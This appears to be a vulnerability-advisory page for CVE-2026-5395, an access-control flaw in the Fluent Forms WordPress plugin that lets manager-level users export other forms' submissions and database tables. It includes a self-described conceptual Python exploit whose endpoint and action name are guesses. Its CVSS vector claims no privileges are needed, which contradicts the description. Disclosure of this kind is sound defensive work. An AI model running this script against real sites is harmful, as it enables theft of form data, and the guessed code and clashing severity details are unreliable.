Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-5395 CVSS 8.2 HIGH

CVE-2026-5395

Published: 2026-05-14 07:16:20
Last Modified: 2026-05-14 14:28:41
Source: [email protected]

Description

The Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.2.0 via the exportEntries function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Fluent Forms manager-level access and above, to bypass form-level access restrictions to access submissions from forms they are not authorized to view, export data from arbitrary database tables, and enumerate database table names via error message disclosure.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Fluent Forms <= 6.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-5395 (Conceptual) # Target: WordPress with Fluent Forms <= 6.2.0 import requests def exploit(target_url, cookies): # Endpoint likely handles export actions url = f"{target_url}/wp-admin/admin-ajax.php" # Payload attempting to export arbitrary data or enumerate tables # 'action' might be 'fluentform_export_entries' or similar based on plugin logic payload = { "action": "fluentform_export_entries", "form_id": "999", # Non-existent ID to trigger error or unauthorized ID "status": "all" } try: response = requests.post(url, data=payload, cookies=cookies) if response.status_code == 200: print("[+] Request sent. Check response for data leak or SQL error.") print(response.text[:200]) else: print("[-] Exploit failed") except Exception as e: print(f"Error: {e}") # Usage requires valid authenticated cookies (Manager level or higher) # exploit("http://target-site.com", {"wordpress_logged_in...": "..."})

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5395", "sourceIdentifier": "[email protected]", "published": "2026-05-14T07:16:20.247", "lastModified": "2026-05-14T14:28:41.283", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 6.2.0 via the exportEntries function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Fluent Forms manager-level access and above, to bypass form-level access restrictions to access submissions from forms they are not authorized to view, export data from arbitrary database tables, and enumerate database table names via error message disclosure."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3507987/fluentform/trunk/app/Services/Transfer/TransferService.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9cd12b8a-2033-4236-abcd-2a8d08e7f099?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.